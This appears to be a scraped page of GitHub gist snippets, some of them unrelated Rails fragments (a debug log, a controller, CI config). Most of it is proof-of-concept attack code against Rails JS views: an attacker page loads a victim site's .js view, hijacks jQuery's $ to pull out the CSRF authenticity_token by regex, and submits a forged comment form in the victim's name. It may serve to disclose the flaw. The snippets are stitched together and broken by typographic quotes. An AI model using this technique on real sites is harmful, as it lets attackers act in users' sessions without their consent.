This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Started GET "/users/35/edit" for 127.0.0.1 at 2014-07-28 12:38:51 +0300 | |
Processing by UsersController#edit as HTML | |
Parameters: {"id"=>"35"} | |
User Load (1.7ms) SELECT "users".* FROM "users" WHERE "users"."id" = 32 ORDER BY "users"."id" ASC LIMIT 1 | |
From: /home/maxim-abramchuck/Dropbox/Work/Rails/adv_board/app/controllers/users_controller.rb @ line 15 UsersController#edit: | |
14: def edit | |
=> 15: binding.pry | |
16: @user.build_avatar unless @user.avatar |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require 'app_responder' | |
class ApplicationController < ActionController::Base | |
include Pundit | |
protect_from_forgery with: :exception | |
before_action :authenticate_user! | |
before_action :configure_permitted_parameters, if: :devise_controller? |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
To circle.yml: | |
dependencies: | |
post: | |
- bin/cisetup | |
checkout: | |
post: | |
- git fetch origin --depth=1000000 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<script type=”text/javascript” src=”index.js”></script> | |
<title>JS views are vulnerable</title> | |
</head> | |
<body> | |
<form action=”http://example.com/comments" method=”POST”> | |
<input id=”token” type=”hidden” name=”authenticity_token” value=””> | |
<input type=”hidden” name=”comment[model_id]” value=”76678"> | |
<input type=”hidden” name=”comment[body]” value=”I’m a cool hacker!”> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$(“.wrapper.dev”).after(“<%= escape_javascript(render(:partial => @partial))%>”) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var _document = document; | |
var token = ‘’; | |
getSecureInfo = function (html) { | |
matches = html.match(/name=”authenticity_token” type=”hidden” value=”(.*)”/); | |
token = matches[1]; | |
document.getElementById(‘token’).value = token; | |
}; | |
function $() { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function $() { | |
return { | |
after: getSecureInfo | |
} | |
}; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
document.write(‘<script src=”http://example.com/users/maximabramchuk/books/new.js"></script>'); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
getSecureInfo = function (html) { | |
matches = html.match(/name=”authenticity_token” type=”hidden” value=”(.*)”/); | |
token = matches[1]; | |
document.getElementById(‘token’).value = token; | |
}; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
document.addEventListener(‘DOMContentLoaded’, function () { document.getElementById(‘token’).value = token; }, false); |
OlderNewer